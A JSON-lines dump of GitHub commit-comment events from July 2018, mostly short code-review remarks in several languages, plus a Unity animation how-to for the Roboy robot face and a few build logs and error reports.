{"id":"7949884689","type":"CommitCommentEvent","actor":{"login":"vikuch"},"repo":{"name":"vikuch/vikuch.github.io"},"payload":{"comment":{"id":29670651,"position":null,"line":null,"path":null,"commit_id":"784486d3339da7d48611ea9c2a44c07e236e3a67","created_at":"2018-07-11T12:55:10Z","updated_at":"2018-07-11T12:55:10Z","author_association":"OWNER","body":"merge branches"}},"created_at":"2018-07-11T12:55:10Z"}
{"id":"7949886097","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dastanabeuov/rewrite"},"payload":{"comment":{"id":29670658,"position":28,"line":29,"path":"route.rb","commit_id":"72a1d04f1e7ee43bf852569ed52409d1eb1b409c","created_at":"2018-07-11T12:55:24Z","updated_at":"2018-07-11T12:55:24Z","author_association":"NONE","body":"правильней - множественное число: `print_stations`"}},"created_at":"2018-07-11T12:55:24Z"}
{"id":"7949886137","type":"CommitCommentEvent","actor":{"login":"vincentfretin"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29670659,"position":32,"line":1198,"path":"assembl/static2/js/app/utils/translations.js","commit_id":"df4fe8f1958e5525fdfa191e95639339c1c76591","created_at":"2018-07-11T12:55:24Z","updated_at":"2018-07-11T12:55:24Z","author_association":"CONTRIBUTOR","body":"c'est pareil pour analytics"}},"created_at":"2018-07-11T12:55:24Z"}
{"id":"7949887214","type":"CommitCommentEvent","actor":{"login":"jserv"},"repo":{"name":"ajblane/dcurl"},"payload":{"comment":{"id":29670662,"position":24,"line":118,"path":"src/pow_fpga_LampaLab.c","commit_id":"0100646d2d101bb7142e33996c4ffe6ed6a53c49","created_at":"2018-07-11T12:55:36Z","updated_at":"2018-07-11T12:55:36Z","author_association":"NONE","body":"Don't insert extra blank lines."}},"created_at":"2018-07-11T12:55:36Z"}
{"id":"7949892160","type":"CommitCommentEvent","actor":{"login":"JulianEyrich"},"repo":{"name":"Roboy/RoboyUnityFace"},"payload":{"comment":{"id":29670671,"position":null,"line":null,"path":null,"commit_id":"a6f7f512b3bfb3b124a585a45502852c77b03e04","created_at":"2018-07-11T12:56:29Z","updated_at":"2018-07-11T12:56:29Z","author_association":"NONE","body":"## How it works\r\n\r\n\r\n### 1. Facial Expressions\r\n\r\nRoboy's facial expressions are animated in Unity. The corresponding repository is in https://github.com/Roboy/RoboyUnityFace  \r\n\r\nFor starting with Unity, clone the repository to your device. For seeing the actual face of Roboy in Unity, go to RoboyUnityFace/assets and open RoboyFace. All existing animations are stored in RoboyUnityFace/assets/animations. Corresponding material (added pictures to show them on the face, e.g. a moustache or sunglasses) are stored in RoboyUnityFace/assets/FaceComponents.\r\n\r\nThe connection to ROS via code (C#) is stored in RoboyUnityFace/assets/RoboyAnimator.cs\r\n\r\nHaving started RoboyFace in Unity,there is a Project window. For viewing all existing animations, first click on \"face\" in the Project Window. In a second step, open the \"Animator\" window. For viewing existing animations, press the play button on the top and trigger the animations in the \"Animator\" (Paramters) window. New animations can be added via the Animation window (if the animation or the Animator window is not shown, you can open it by clicking on the \"Window\" button at the bar on the top of Unity program). \r\n\r\nFor all current and new animations, there is the Inspector on the right hand side, which has different functions for changing or modifying existing and new animations. \r\n\r\nIf new animations were created, you must add transitions from the idle status to the animation status and back to the idle status. This can also be done in the Animator window. \r\n\r\nIn addition to the old faces and expressions in Unity, the following faces & emotions were added in SS18 by animating them in Unity and can be triggered via ROS:\r\n - suprised Roboy\r\n - crying Roboy\r\n - irritated Roboy\r\n - Roboy wearing sunglasses\r\n - Roboy wearing spectacles\r\n - Roboy having a moustache\r\n\r\n\r\n#### Emotions\r\n\r\nPrerequesites: - Installation of Unity\r\n\r\nTo start, clone the repository https://github.com/Roboy/RoboyUnityFace.git on your computer. \r\n\r\nMore detailed information is written in the upper section howitworks. \r\n\r\nIn order to start the animations, it is necessary to disconnect from ROS. Otherwise, Unity will show an error message.  This can be avoided by changing the code in RoboyUnityFace/Assets/RoboyAnimator.cs . The line which must be changed looks like follows. In this line of code, the offline toggle should be set to true.\r\n\r\n```\r\nbool offlineToggle = true;\r\n```\r\n\r\nNow, all existing animations can be triggered in Unity by starting the play mode and by triggering animations in the Animator column. \r\n\r\nAdditional faces could be added. Useful tutorials for starting with Unity can be found on YouTube and on the Unity homepage."}},"created_at":"2018-07-11T12:56:29Z"}
{"id":"7949894959","type":"CommitCommentEvent","actor":{"login":"abdelmoneim707"},"repo":{"name":"udacity/ud839_Miwok"},"payload":{"comment":{"id":29670678,"position":17,"line":34,"path":"app/src/main/java/com/example/android/miwok/MainActivity.java","commit_id":"952710d08e817861e515139549a9d840e7afb086","created_at":"2018-07-11T12:57:00Z","updated_at":"2018-07-11T12:57:00Z","author_association":"NONE","body":"}\r\n"}},"created_at":"2018-07-11T12:57:00Z"}
{"id":"7949895007","type":"CommitCommentEvent","actor":{"login":"platinum4"},"repo":{"name":"platomav/CPUMicrocodes"},"payload":{"comment":{"id":29670679,"position":null,"line":null,"path":null,"commit_id":"e57dee324fd819ac4907d3855b38d1a74dad4ff5","created_at":"2018-07-11T12:57:00Z","updated_at":"2018-07-11T12:57:00Z","author_association":"NONE","body":"Nice to see Bloomfield made it on here; originally it was anticipated to have development stopped for it:\r\n\r\nhttps://www.techpowerup.com/img/s8LogRWSd2ZtCdCp.jpg"}},"created_at":"2018-07-11T12:57:00Z"}
{"id":"7949895126","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29670680,"position":null,"line":null,"path":null,"commit_id":"f61183cb3adbd9fc35376a2aaea2847857f8db6e","created_at":"2018-07-11T12:57:01Z","updated_at":"2018-07-11T12:57:01Z","author_association":"NONE","body":"update-libraries (mbadams5) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1683 of 1683 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f61183cb3adbd9fc35376a2aaea2847857f8db6e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f61183cb3adbd9fc35376a2aaea2847857f8db6e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f61183cb3adbd9fc35376a2aaea2847857f8db6e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.0%25-green.png)</a>\n"}},"created_at":"2018-07-11T12:57:01Z"}
{"id":"7949901646","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dastanabeuov/rewrite"},"payload":{"comment":{"id":29670696,"position":46,"line":46,"path":"train.rb","commit_id":"72a1d04f1e7ee43bf852569ed52409d1eb1b409c","created_at":"2018-07-11T12:58:12Z","updated_at":"2018-07-11T12:58:12Z","author_association":"NONE","body":"а что за переменная или метод `current_index` ?\r\nнигде не определены вроде ни метод, ни переменная"}},"created_at":"2018-07-11T12:58:12Z"}
{"id":"7949905769","type":"CommitCommentEvent","actor":{"login":"reionut"},"repo":{"name":"reionut/responsive-test"},"payload":{"comment":{"id":29670700,"position":4,"line":81,"path":"header/header.css","commit_id":"c03cf47964a524e54ba968e8fad4369140d50423","created_at":"2018-07-11T12:58:54Z","updated_at":"2018-07-11T12:58:54Z","author_association":"OWNER","body":" Good point!\nrem units are relational to the font-size value of the HTML tag.The vw (view-width) units are relational to the viewport size.\nThis two lines gives you the answer to both of your questions.\nNow, why did I used them in that way!? - I am still learning when and how to use them.\nThank you again for your support!\n    On Wednesday, July 11, 2018, 2:04:48 PM GMT+3, Catalin Berta <notifications@github.com> wrote:  \n \n \nI see you are using REMs and VWs in various locations, can you tell me the difference between them and when you should use one or the other?\n\n—\nYou are receiving this because you authored the thread.\nReply to this email directly, view it on GitHub, or mute the thread.\n   \n\n|  | Virus-free. www.avast.com  |\n\n"}},"created_at":"2018-07-11T12:58:54Z"}
{"id":"7949906026","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dastanabeuov/rewrite"},"payload":{"comment":{"id":29670704,"position":46,"line":46,"path":"train.rb","commit_id":"72a1d04f1e7ee43bf852569ed52409d1eb1b409c","created_at":"2018-07-11T12:58:57Z","updated_at":"2018-07-11T12:58:57Z","author_association":"NONE","body":"тот же вопрос по строкам 50, 54, 60, 66"}},"created_at":"2018-07-11T12:58:57Z"}
{"id":"7949908121","type":"CommitCommentEvent","actor":{"login":"karalex"},"repo":{"name":"huobiapi/API_Docs"},"payload":{"comment":{"id":29670706,"position":null,"line":null,"path":null,"commit_id":"7780ad2d03f9d47a728daa3ff8388d6026983526","created_at":"2018-07-11T12:59:19Z","updated_at":"2018-07-11T12:59:19Z","author_association":"NONE","body":"OpenSSL> version\r\nOpenSSL 1.1.0h  27 Mar 2018\r\nOpenSSL> openssl ec -in privatekey.pem -pubout -out publickey.pem\r\nInvalid command 'openssl'; type \"help\" for a list.\r\nerror in openssl\r\nOpenSSL>"}},"created_at":"2018-07-11T12:59:19Z"}
{"id":"7949911605","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dastanabeuov/rewrite"},"payload":{"comment":{"id":29670714,"position":54,"line":54,"path":"train.rb","commit_id":"72a1d04f1e7ee43bf852569ed52409d1eb1b409c","created_at":"2018-07-11T12:59:54Z","updated_at":"2018-07-11T12:59:54Z","author_association":"NONE","body":"если первая станция, т.е. индекс 0, то этот код вернет последнюю станцию , потому что вызов будет `@route.stations[-1]`, что-то ты тут забыл"}},"created_at":"2018-07-11T12:59:54Z"}
{"id":"7949912911","type":"CommitCommentEvent","actor":{"login":"LipuFei"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":29670718,"position":null,"line":null,"path":null,"commit_id":"596a7b7169b9c7e41cd4751f99eea656f67ed2b7","created_at":"2018-07-11T13:00:09Z","updated_at":"2018-07-11T13:00:09Z","author_association":"CONTRIBUTOR","body":"I feel that there are too many hacks in that dialog handling, especially with threads, locks and sleep in a while loop to keep Qt still going. Would it make more sense to add a general `onExit()` phase where we can do all kinds of checks and show a confirmation dialog when needed?"}},"created_at":"2018-07-11T13:00:09Z"}
{"id":"7949915683","type":"CommitCommentEvent","actor":{"login":"PythonLimited"},"repo":{"name":"S3NEO/android_device_samsung_msm8226-common"},"payload":{"comment":{"id":29670726,"position":null,"line":null,"path":null,"commit_id":"ecce0c16f687b06750db2dce24a73604ed950f4d","created_at":"2018-07-11T13:00:36Z","updated_at":"2018-07-11T13:00:36Z","author_association":"MEMBER","body":"The raw pictures are actually saved under /data/<timestamp>_out.yuv\r\nThe resolution is 3264 by 2448 and the format is YUV420sp (NV 12) with the standart YVU pixel format."}},"created_at":"2018-07-11T13:00:36Z"}
{"id":"7949916509","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dastanabeuov/rewrite"},"payload":{"comment":{"id":29670727,"position":59,"line":59,"path":"train.rb","commit_id":"72a1d04f1e7ee43bf852569ed52409d1eb1b409c","created_at":"2018-07-11T13:00:44Z","updated_at":"2018-07-11T13:00:44Z","author_association":"NONE","body":"а если следующей станции нет? куда уедет поезд?"}},"created_at":"2018-07-11T13:00:44Z"}
{"id":"7949918317","type":"CommitCommentEvent","actor":{"login":"plry"},"repo":{"name":"plry/Github-training-camp01"},"payload":{"comment":{"id":29670732,"position":null,"line":null,"path":null,"commit_id":"e8bf35a81b174255ddbd72076be4e3677ef9ebd4","created_at":"2018-07-11T13:01:02Z","updated_at":"2018-07-11T13:01:02Z","author_association":"OWNER","body":"add more emoji"}},"created_at":"2018-07-11T13:01:02Z"}
{"id":"7949918920","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dastanabeuov/rewrite"},"payload":{"comment":{"id":29670736,"position":64,"line":64,"path":"train.rb","commit_id":"72a1d04f1e7ee43bf852569ed52409d1eb1b409c","created_at":"2018-07-11T13:01:09Z","updated_at":"2018-07-11T13:01:09Z","author_association":"NONE","body":"предыдущей станции тоже может не быть"}},"created_at":"2018-07-11T13:01:09Z"}
{"id":"7949923390","type":"CommitCommentEvent","actor":{"login":"frankvalentine"},"repo":{"name":"frankvalentine/OneLifeData7"},"payload":{"comment":{"id":29670743,"position":null,"line":null,"path":null,"commit_id":"3bcd88b9e6497de25be277f327cd67aae0be837c","created_at":"2018-07-11T13:01:52Z","updated_at":"2018-07-11T13:01:52Z","author_association":"OWNER","body":"fuck yeah"}},"created_at":"2018-07-11T13:01:52Z"}
{"id":"7949924045","type":"CommitCommentEvent","actor":{"login":"mw24"},"repo":{"name":"nedap/nuts-webpresence"},"payload":{"comment":{"id":29670748,"position":null,"line":null,"path":null,"commit_id":"b21f5964ba69548db8284637d4f1c57134dc0750","created_at":"2018-07-11T13:02:00Z","updated_at":"2018-07-11T13:02:00Z","author_association":"COLLABORATOR","body":"ok prima"}},"created_at":"2018-07-11T13:02:00Z"}
{"id":"7949934063","type":"CommitCommentEvent","actor":{"login":"vincentfretin"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29670763,"position":66,"line":256,"path":"assembl/static2/js/app/components/voteSession/gaugeVoteForProposal.jsx","commit_id":"83ca75350e6748cdfd89a20c64641c9fc68455b1","created_at":"2018-07-11T13:03:43Z","updated_at":"2018-07-11T13:03:43Z","author_association":"CONTRIBUTOR","body":"Don't you have to remove this setState here as well?"}},"created_at":"2018-07-11T13:03:43Z"}
{"id":"7949934734","type":"CommitCommentEvent","actor":{"login":"hswei0"},"repo":{"name":"hswei0/mobility"},"payload":{"comment":{"id":29670764,"position":null,"line":null,"path":null,"commit_id":"c14567bfea96edca6eb735f9be43f18e127410a5","created_at":"2018-07-11T13:03:50Z","updated_at":"2018-07-11T13:03:50Z","author_association":"OWNER","body":"更新到最新進度"}},"created_at":"2018-07-11T13:03:50Z"}
{"id":"7949935055","type":"CommitCommentEvent","actor":{"login":"vincentfretin"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29670766,"position":75,"line":279,"path":"assembl/static2/js/app/components/voteSession/gaugeVoteForProposal.jsx","commit_id":"83ca75350e6748cdfd89a20c64641c9fc68455b1","created_at":"2018-07-11T13:03:53Z","updated_at":"2018-07-11T13:03:53Z","author_association":"CONTRIBUTOR","body":"And similar changes here?"}},"created_at":"2018-07-11T13:03:53Z"}
{"id":"7949935962","type":"CommitCommentEvent","actor":{"login":"Tomisha"},"repo":{"name":"Tomisha/Tomisha.github.io"},"payload":{"comment":{"id":29670770,"position":null,"line":null,"path":null,"commit_id":"e4ab74353a1c2e4ca3ddd6ce818bbf9753f1796b","created_at":"2018-07-11T13:04:02Z","updated_at":"2018-07-11T13:04:02Z","author_association":"OWNER","body":"Lesson-2 Assignment"}},"created_at":"2018-07-11T13:04:02Z"}
{"id":"7949949883","type":"CommitCommentEvent","actor":{"login":"micgc"},"repo":{"name":"magento/magento2"},"payload":{"comment":{"id":29670792,"position":null,"line":null,"path":null,"commit_id":"5befa84a04c577faf4f587cfe6aedc6a793b4863","created_at":"2018-07-11T13:06:27Z","updated_at":"2018-07-11T13:06:27Z","author_association":"NONE","body":"This commit probably shouldn't be here ?"}},"created_at":"2018-07-11T13:06:27Z"}
{"id":"7949954798","type":"CommitCommentEvent","actor":{"login":"kolyshkin"},"repo":{"name":"containerd/continuity"},"payload":{"comment":{"id":29670801,"position":4,"line":9,"path":"sysx/chmod_unix.go","commit_id":"504b584b3f936bf9fcfb7803536dc547d3415cc7","created_at":"2018-07-11T13:07:19Z","updated_at":"2018-07-11T13:07:19Z","author_association":"NONE","body":"Done (in a separate commit)."}},"created_at":"2018-07-11T13:07:19Z"}
{"id":"7949956356","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"akimlyubchenko/Training-Summer-Express-2018"},"payload":{"comment":{"id":29670805,"position":28,"line":21,"path":"NET.S.2018.Lyubchenko.05.06/Polynomial/Polynomial.cs","commit_id":"a3ec7ea271a6eb54f46a4ceaee630f52b67a5e02","created_at":"2018-07-11T13:07:36Z","updated_at":"2018-07-11T13:07:36Z","author_association":"NONE","body":"this.coefs = coefs; - нарушение сохранности!\r\n"}},"created_at":"2018-07-11T13:07:36Z"}
{"id":"7949956493","type":"CommitCommentEvent","actor":{"login":"TerminusBot"},"repo":{"name":"Terminus2049/Terminus2049.github.io"},"payload":{"comment":{"id":29670807,"position":null,"line":null,"path":null,"commit_id":"44c75ce101c7cb977a7e42f9ba91e40ad6747538","created_at":"2018-07-11T13:07:37Z","updated_at":"2018-07-11T13:07:37Z","author_association":"MEMBER","body":"这篇是在 matters ，审查删不掉的。"}},"created_at":"2018-07-11T13:07:37Z"}
{"id":"7949960186","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"akimlyubchenko/Training-Summer-Express-2018"},"payload":{"comment":{"id":29670814,"position":53,"line":31,"path":"NET.S.2018.Lyubchenko.05.06/Polynomial/Polynomial.cs","commit_id":"a3ec7ea271a6eb54f46a4ceaee630f52b67a5e02","created_at":"2018-07-11T13:08:17Z","updated_at":"2018-07-11T13:08:17Z","author_association":"NONE","body":"ArgumentOutOfRangeException!"}},"created_at":"2018-07-11T13:08:17Z"}
{"id":"7949960572","type":"CommitCommentEvent","actor":{"login":"GoldenBadger"},"repo":{"name":"AJubatus/scrotum"},"payload":{"comment":{"id":29670816,"position":null,"line":null,"path":null,"commit_id":"7fe732a7c43225003171e56c5a19a62445cdb2f0","created_at":"2018-07-11T13:08:21Z","updated_at":"2018-07-11T13:08:21Z","author_association":"NONE","body":"LGTM, Approval"}},"created_at":"2018-07-11T13:08:21Z"}
{"id":"7949961271","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"akimlyubchenko/Training-Summer-Express-2018"},"payload":{"comment":{"id":29670817,"position":63,"line":41,"path":"NET.S.2018.Lyubchenko.05.06/Polynomial/Polynomial.cs","commit_id":"a3ec7ea271a6eb54f46a4ceaee630f52b67a5e02","created_at":"2018-07-11T13:08:29Z","updated_at":"2018-07-11T13:08:29Z","author_association":"NONE","body":"ArgumentOutOfRangeException!"}},"created_at":"2018-07-11T13:08:29Z"}
{"id":"7949965902","type":"CommitCommentEvent","actor":{"login":"alexleskov"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29670822,"position":3,"line":2,"path":"Lesson3/station.rb","commit_id":"8bfa7bce833b38613c1e2f2bfe6dde0397b6f1d2","created_at":"2018-07-11T13:09:19Z","updated_at":"2018-07-11T13:09:19Z","author_association":"OWNER","body":"В Route понял почему косяк. Здесь не совсем.\r\n\r\nЯ в 24 и 25 строках просто инстантсные переменные присваиваю, а не создаю метод. Но, при этом, я хочу иметь возможность вызывать методом эти переменные извне."}},"created_at":"2018-07-11T13:09:19Z"}
{"id":"7949968700","type":"CommitCommentEvent","actor":{"login":"dosdarwin"},"repo":{"name":"dosowen/leap-year"},"payload":{"comment":{"id":29670824,"position":null,"line":null,"path":null,"commit_id":"6899cb990a6ec154e7caa394871bee262a1d3a47","created_at":"2018-07-11T13:09:49Z","updated_at":"2018-07-11T13:09:49Z","author_association":"NONE","body":"so cool"}},"created_at":"2018-07-11T13:09:49Z"}
{"id":"7949971647","type":"CommitCommentEvent","actor":{"login":"dosdarwin"},"repo":{"name":"dosowen/leap-year"},"payload":{"comment":{"id":29670830,"position":null,"line":null,"path":null,"commit_id":"6899cb990a6ec154e7caa394871bee262a1d3a47","created_at":"2018-07-11T13:10:21Z","updated_at":"2018-07-11T13:10:21Z","author_association":"NONE","body":"so goooooooooooooooooooood"}},"created_at":"2018-07-11T13:10:21Z"}
{"id":"7949973238","type":"CommitCommentEvent","actor":{"login":"dosowen"},"repo":{"name":"dosowen/leap-year"},"payload":{"comment":{"id":29670834,"position":null,"line":null,"path":null,"commit_id":"9ea21f6724878accd73fb2d89156764eb26cb3ab","created_at":"2018-07-11T13:10:37Z","updated_at":"2018-07-11T13:10:37Z","author_association":"OWNER","body":"WOW"}},"created_at":"2018-07-11T13:10:37Z"}
{"id":"7949973753","type":"CommitCommentEvent","actor":{"login":"dosowen"},"repo":{"name":"dosowen/leap-year"},"payload":{"comment":{"id":29670835,"position":null,"line":null,"path":null,"commit_id":"9ea21f6724878accd73fb2d89156764eb26cb3ab","created_at":"2018-07-11T13:10:43Z","updated_at":"2018-07-11T13:10:43Z","author_association":"OWNER","body":"OMG"}},"created_at":"2018-07-11T13:10:43Z"}
{"id":"7949973803","type":"CommitCommentEvent","actor":{"login":"tguillem"},"repo":{"name":"haasn/vlc"},"payload":{"comment":{"id":29670837,"position":null,"line":null,"path":null,"commit_id":"0a13a53b803929a1e3129877a5ac956831993e57","created_at":"2018-07-11T13:10:44Z","updated_at":"2018-07-11T13:10:44Z","author_association":"NONE","body":"I like the idea but you can put this code in the modules directory directly (and don't expose it from the VLC core API).\r\nYou can look at modules/codec/avcodec.h for such examples (but don't copy the bad naming of this file).\r\n\r\nBtw, I guess  you can create a modules/video_output/placebo directory to put such code."}},"created_at":"2018-07-11T13:10:44Z"}
{"id":"7949977675","type":"CommitCommentEvent","actor":{"login":"narnzb"},"repo":{"name":"PeiyuYang/BTCPoolAPIDocs"},"payload":{"comment":{"id":29670839,"position":19,"line":22,"path":"zh-cn.md","commit_id":"a915e4639a5bb73d9cfd3638f4f884757e6b0545","created_at":"2018-07-11T13:11:25Z","updated_at":"2018-07-11T13:11:25Z","author_association":"NONE","body":"?"}},"created_at":"2018-07-11T13:11:25Z"}
{"id":"7949978869","type":"CommitCommentEvent","actor":{"login":"isaachier"},"repo":{"name":"sustrik/libmill"},"payload":{"comment":{"id":29670841,"position":null,"line":null,"path":null,"commit_id":"61322eaf794db1941b4ee1bc64836e3378ca06f0","created_at":"2018-07-11T13:11:37Z","updated_at":"2018-07-11T13:11:37Z","author_association":"CONTRIBUTOR","body":"Not sure why you want either build to be non-relocatable. Try using `./configure - -prefix=install-root` do `make install` then move `install-root` to any other directory. IIRC, any linked will stop working and pkg config won't give you the correct directory."}},"created_at":"2018-07-11T13:11:37Z"}
{"id":"7949980201","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"akimlyubchenko/Training-Summer-Express-2018"},"payload":{"comment":{"id":29670844,"position":159,"line":99,"path":"NET.S.2018.Lyubchenko.05.06/Polynomial/Polynomial.cs","commit_id":"a3ec7ea271a6eb54f46a4ceaee630f52b67a5e02","created_at":"2018-07-11T13:11:51Z","updated_at":"2018-07-11T13:11:51Z","author_association":"NONE","body":"можно короче lhs + (-rhs);  только для этого нужно иметь перегруженный унарный \"минус\", который следовало бы перегрузить"}},"created_at":"2018-07-11T13:11:51Z"}
{"id":"7949980519","type":"CommitCommentEvent","actor":{"login":"lnatal"},"repo":{"name":"espressif/arduino-esp32"},"payload":{"comment":{"id":29670845,"position":null,"line":null,"path":null,"commit_id":"12ca9e8b521127c5455b8e45b463371cc0cc6d3d","created_at":"2018-07-11T13:11:55Z","updated_at":"2018-07-11T13:11:55Z","author_association":"NONE","body":"Good job chemicstry!\r\nNow **Serial2** work perfect at software reset.\r\nBut when reconnect in wifi, still receiving garbage. There are any suggestion to fix it?\r\n"}},"created_at":"2018-07-11T13:11:55Z"}
{"id":"7949981012","type":"CommitCommentEvent","actor":{"login":"GhoulFeast"},"repo":{"name":"GhoulFeast/Pension_0"},"payload":{"comment":{"id":29670847,"position":null,"line":null,"path":null,"commit_id":"a09084cebe9949dbf9250975503e2514b7183cf5","created_at":"2018-07-11T13:12:00Z","updated_at":"2018-07-11T13:12:00Z","author_association":"OWNER","body":"更新"}},"created_at":"2018-07-11T13:12:00Z"}
{"id":"7949982864","type":"CommitCommentEvent","actor":{"login":"giant995"},"repo":{"name":"DataTables/Buttons"},"payload":{"comment":{"id":29670851,"position":null,"line":null,"path":null,"commit_id":"363c2025616f8f8f3729af0ab945501e2518f2c5","created_at":"2018-07-11T13:12:20Z","updated_at":"2018-07-11T13:12:20Z","author_association":"NONE","body":"It fixes the issue for me at the moment. I have put the fix myself, waiting for the next release."}},"created_at":"2018-07-11T13:12:20Z"}
{"id":"7949988361","type":"CommitCommentEvent","actor":{"login":"IgorKachura"},"repo":{"name":"BibleQuote/BibleQuote-Modules"},"payload":{"comment":{"id":29670858,"position":null,"line":null,"path":null,"commit_id":"1fe8df4e1a3afedfebbdd9d66e813a1cd33d0050","created_at":"2018-07-11T13:13:16Z","updated_at":"2018-07-11T13:13:16Z","author_association":"CONTRIBUTOR","body":"0.0.1"}},"created_at":"2018-07-11T13:13:16Z"}
{"id":"7949990794","type":"CommitCommentEvent","actor":{"login":"isaachier"},"repo":{"name":"sustrik/libmill"},"payload":{"comment":{"id":29670863,"position":null,"line":null,"path":null,"commit_id":"61322eaf794db1941b4ee1bc64836e3378ca06f0","created_at":"2018-07-11T13:13:39Z","updated_at":"2018-07-11T13:13:39Z","author_association":"CONTRIBUTOR","body":"And you might not see this in other packages because people don't generally think to do it until people complain. I know for a fact this issue has come up in bison and git. "}},"created_at":"2018-07-11T13:13:39Z"}
{"id":"7949995749","type":"CommitCommentEvent","actor":{"login":"araspitzu"},"repo":{"name":"araspitzu/bitcoin"},"payload":{"comment":{"id":29670875,"position":null,"line":null,"path":null,"commit_id":"87a5539ff38499a0230095793c8e2eedd70f125d","created_at":"2018-07-11T13:14:30Z","updated_at":"2018-07-11T13:14:30Z","author_association":"OWNER","body":"Awesome the (git diff) was supposed to be (!!) , thanks bash"}},"created_at":"2018-07-11T13:14:30Z"}
{"id":"7949998398","type":"CommitCommentEvent","actor":{"login":"JeremyAronson"},"repo":{"name":"JeremyAronson/Algorithms"},"payload":{"comment":{"id":29670883,"position":null,"line":null,"path":null,"commit_id":"a7be4d3c255bf998be2160f55015808afe63c975","created_at":"2018-07-11T13:14:59Z","updated_at":"2018-07-11T13:14:59Z","author_association":"OWNER","body":"Title change: add .hql"}},"created_at":"2018-07-11T13:14:59Z"}
{"id":"7949999188","type":"CommitCommentEvent","actor":{"login":"jzarob"},"repo":{"name":"UA-ACM-Student-Chapter/UA-ACM-Student-Chapter.github.io"},"payload":{"comment":{"id":29670887,"position":5,"line":42,"path":"js/acm-1.0.1.js","commit_id":"2789e7a15bc8e37451fa1a5b077c876079553ec1","created_at":"2018-07-11T13:15:08Z","updated_at":"2018-07-11T13:15:08Z","author_association":"MEMBER","body":"May want to allow uppercase characters as well. Also, UA has several different aliases that are associated with crimson accounts"}},"created_at":"2018-07-11T13:15:08Z"}
{"id":"7950000426","type":"CommitCommentEvent","actor":{"login":"frnkvieira"},"repo":{"name":"vibora-io/vibora"},"payload":{"comment":{"id":29670891,"position":40,"line":193,"path":"vibora/utils.py","commit_id":"7d10ab61cb91e39b71fcf13b23cf57d8c1680f72","created_at":"2018-07-11T13:15:20Z","updated_at":"2018-07-11T13:15:20Z","author_association":"MEMBER","body":"When I wrote this comment there were a few checkups and a much smaller sleep timeout... Anyway, the process is awakening every 60 seconds, wasting a few more cycles every 60 seconds :) useless info, I know, this code is outdated, this function was completely removed in v0.1.0 branch... thanks for noticing it! :)"}},"created_at":"2018-07-11T13:15:20Z"}
{"id":"7950000938","type":"CommitCommentEvent","actor":{"login":"zengzhicheng"},"repo":{"name":"cloudfirst/PromAnsible"},"payload":{"comment":{"id":29670894,"position":null,"line":null,"path":null,"commit_id":"e889faf85649e1bcfa4ee80f8af20a7403d5f397","created_at":"2018-07-11T13:15:25Z","updated_at":"2018-07-11T13:15:25Z","author_association":"NONE","body":"Hi，Mr Li：It occur an error when i compile PromAnsile，Please help . That error ：\r\ntar vxf /home/src/PromAnsible/daemon/alertman/alertmanager.tar.gz --strip 1 -C debian/alertman-server/usr/local/daemon/alertman/\r\ntar: This does not look like a tar archive\r\ngzip: stdin: unexpected end of file\r\ntar: Child returned status 1\r\ntar: Error is not recoverable: exiting now\r\nMakefile:41: recipe for target 'install' failed\r\nmake[1]: *** [install] Error 2\r\nmake[1]: Leaving directory '/home/src/PromAnsible'\r\n/usr/share/cdbs/1/class/makefile.mk:61: recipe for target 'debian/stamp-makefile-install' failed\r\nmake: *** [debian/stamp-makefile-install] Error 2\r\ndpkg-buildpackage: error: debian/rules binary gave error exit status 2\r\n\r\n"}},"created_at":"2018-07-11T13:15:25Z"}
{"id":"7950006816","type":"CommitCommentEvent","actor":{"login":"yasmohamad"},"repo":{"name":"yasmohamad/hello-world"},"payload":{"comment":{"id":29670916,"position":null,"line":null,"path":null,"commit_id":"dcb89c920ac79a830183570828984d1ff755137c","created_at":"2018-07-11T13:16:25Z","updated_at":"2018-07-11T13:16:25Z","author_association":"OWNER","body":"this program for test 2"}},"created_at":"2018-07-11T13:16:25Z"}
{"id":"7950007586","type":"CommitCommentEvent","actor":{"login":"bitraid"},"repo":{"name":"qutebrowser/qutebrowser"},"payload":{"comment":{"id":29670919,"position":6,"line":45,"path":"misc/qutebrowser.nsi","commit_id":"0b9855598742e09853efff798a4f61cbc86fded5","created_at":"2018-07-11T13:16:33Z","updated_at":"2018-07-11T13:16:33Z","author_association":"CONTRIBUTOR","body":"The quote is not closed. But i don't think this line is needed anyway."}},"created_at":"2018-07-11T13:16:33Z"}
